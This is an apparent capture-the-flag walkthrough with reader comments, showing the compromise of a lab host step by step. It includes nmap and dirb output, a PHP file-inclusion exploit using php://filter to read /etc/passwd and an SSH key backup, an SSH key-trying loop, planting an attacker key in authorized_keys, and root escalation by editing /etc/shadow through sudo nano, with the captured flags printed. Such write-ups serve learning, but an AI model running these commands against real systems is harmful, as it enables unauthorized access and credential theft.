.
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $cat allports.nmap # Nmap 7.91 scan initiated Wed Feb 17 08:03:40 2021 as: nmap -A -oN allports.nmap 10.150.150.55 Nmap scan report for 10.150.150.55 Host is up (0.032s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 0 0 13 Jun 12 2020 test | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.66.66.42 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 139/tcp open netbios-ssn Samba smbd 4.6.2 445/tcp open netbios-ssn Samba smbd 4.6.2 1055/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: 53m37s |_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-02-17T08:57:32 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Feb 17 08:03:55 2021 -- 1 IP address (1 host up) scanned in 14.70 seconds ┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
.
┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $dirb http://10.150.150.55 /usr/share/wordlists/10k-most-common.txt -X .php ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Feb 18 08:27:26 2021 URL_BASE: http://10.150.150.55/ WORDLIST_FILES: /usr/share/wordlists/10k-most-common.txt EXTENSIONS_LIST: (.php) | (.php) [NUM = 1] ----------------- GENERATED WORDS: 10000 ---- Scanning URL: http://10.150.150.55/ ---- + http://10.150.150.55/trick.php (CODE:200|SIZE:0) + http://10.150.150.55/info.php (CODE:200|SIZE:70050) + http://10.150.150.55/??????.php (CODE:200|SIZE:10918) + http://10.150.150.55/?????.php (CODE:200|SIZE:10918) ----------------- END_TIME: Thu Feb 18 08:32:58 2021 DOWNLOADED: 10000 - FOUND: 4 ┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $cat trick.php <?php include($_GET['page']); ?>
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $curl -X POST –data “file=browser.php” 10.150.150.55/info.php
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $smbclient -L 10.150.150.55 -U "" -N Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers IPC$ IPC IPC Service (ubuntu server (Samba, Ubuntu)) SMB1 disabled -- no workgroup available
trick.php?page=index.html
curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=index.php' | base64 -d > index.php
En in die source vind je dan:
index.php?path=/
=> http://10.150.150.55/index.php?path=/
http://10.150.150.55/index.php?path=/home/sally/backup/SSHArchiveBackup.tar.gz
curl ‘http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz’ | base64 -d > home/sally/backup/SSHArchiveBackup.tar.gz
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $ls -la total 256 drwxr-xr-x 1 user user 138 Feb 17 10:55 . drwxr-xr-x 1 user user 2034 Feb 17 08:02 .. -rw-r--r-- 1 user user 1617 Feb 17 08:03 allports.nmap -rw-r--r-- 1 user user 56184 Feb 17 10:45 browser.php -rw-r--r-- 1 user user 6 Feb 17 08:05 hallo.txt -rw-r--r-- 1 user user 4694 Feb 17 10:24 index.php -rw-r--r-- 1 user user 183770 Feb 17 10:55 SSHArchiveBackup.tar.gz -rw-r--r-- 1 user user 13 Feb 17 08:06 test ┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/sally/backup/SSHArchiveBackup.tar.gz' | base64 -d > SSHArchiveBackup.tar.gz
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/etc/passwd' | base64 -d > passwd % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 4128 100 4128 0 0 58971 0 --:--:-- --:--:-- --:--:-- 58971 ┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $cat passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin --snip-- sshd:x:126:65534::/run/sshd:/usr/sbin/nologin gary:x:1001:1001::/home/gary:/bin/sh john:x:1002:1002::/home/john:/bin/sh sally:x:1003:1003::/home/sally:/bin/sh alice:x:1004:1004::/home/alice:/bin/sh ftp:x:127:133:ftp daemon,,,:/srv/ftp/home/:/usr/sbin/nologin ftpuser:x:1005:1005::/home/ftpuser:/bin/sh Debian-snmp:x:128:136::/var/lib/snmp:/bin/false ┌─[user@parrot-virtual]─[~/ptd/10.150.150.55]
┌─[user@parrot-virtual]─[~/ptd/10.150.150.55] └──╼ $curl 'http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/alice/myFile.txt' | base64 -d > myFile.txt
for key in id_rsa*; do echo $key; ssh -p 1055 -o "PreferredAuthentications=publickey" alice@10.150.150.55 -i $key; done En dan zelfde voor andere users (gary, sally en alice) for key in id_rsa*; do echo $key; ssh -p 1055 -o "PreferredAuthentications=publickey" john@10.150.150.55 -i $key; done
curl ‘http://10.150.150.55/trick.php?page=php://filter/convert.base64-encode/resource=/home/john/FLAG79.txt’ | base64 -d > FLAG79.txt
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC9I2y+p4cBMuaydINICFfYW7EFhDJA0DaLxokCz5UutruL+oNA2oJmeAqdK1CaHyfQd56TSnzCruadO3mOCjzCLBuxDxYTJxsOpOaaJP/fUfFrUG2A1rqQzxXYy6ylQEJzyN+bdO5U3C7HpY7W5LMRZls8bw8YhO+PMZVS7Nv6z/+iDbqk56RyG2yDcb8aJDX3WTv0jTMbNRCUfn2dZzoXymGbZcKpUd2ep4u+G4wHOceDHxAAB2bPZYIJcEsTsmDjtKueJCb9deOOWtZ/Y9ZLmnA807KiHhbAquiWTazNNFiFrKQv0/aJpW9q19ZYRE1GUz6WNLcYFJsbBzLWmjTXMoHIBtNVnd0KuRYKubRNcENNIg2IebCdV5NcYuzE8+AUGyIR8EAmZ4s8XCWMk/yj1kPep+PcyHMj+QaP6kn3i1ub2As39K6WB6txDo4CzIv3EFWprtRX3o43/ItSLVmhTK2QVfgEcefAyCV52b8LKvjPJ0QZB1Ka2L5ogagc9XU= root@parrot-virtual" > authorized_keys
┌─[✗]─[user@parrot-virtual]─[~/ptd/10.150.150.55]
└──╼ $sudo ssh -i id_rsa john@10.150.150.55 -p 1055
Silence Please
Last login: Sat Jul 4 02:27:27 2020 from 10.210.210.55
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ cat FLAG79.txt
3ca569f9d5bc771b0457c4f4d42d29c4824e8d70
$ sudo -l
Matching Defaults entries for john on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
logfile=/var/log/sudo.log
User john may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/nano
$ pwd
/home/john/.ssh
$ openssl passwd -6 -salt xyz yourpass
$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.
$
$ nano /etc/shadow
$ id
uid=1002(john) gid=1002(john) groups=1002(john),1006(netAdmin)
$ sudo nano /etc/shadow
$ su root
Password:
root@ubuntu:/home/john# cd /root
root@ubuntu:~# ls
FLAG80.txt hiddenFile snap
root@ubuntu:~# cat FLAG80.txt
75a60cd346351234ecb8348d7c1da94dac75fc4c
root@ubuntu:~#
root@ubuntu:~# cat /etc/shadow | grep root
root:$6$xyz$VKswtvLoVpOLcpjDMIFXhxa8ukqqKSKHjcPBLZUk9NxWldmlFQY4stUGo.QjEhav7mp86ih2PRqYPqjkhWi5y.:18501:0:99999:7:::
root@ubuntu:~#
Author : Puckiestyle
Hi,
Thanks for the writeup.
Actually, if I can log in with ssh into all accounts (except john), I do not understand how I can create the authorized_keys in john’s directory (no rights).
Can you explain please ?
If you ssh login to gary, you will see that chatBackup file said that both John and Sally are network admin, which can help for ssh access,so when using the above for loop can get the Sally id_rsa key and log in with it, then switch to john home directory, using ls -la, will see .ssh directory (only accessible by john or netAdmin group) , then in your own machine can use tool (ssh-keygen) to create ssh key pair, and overwrite the authorized_key in john .ssh directory with new pub key you created, then can ssh to john using the private key.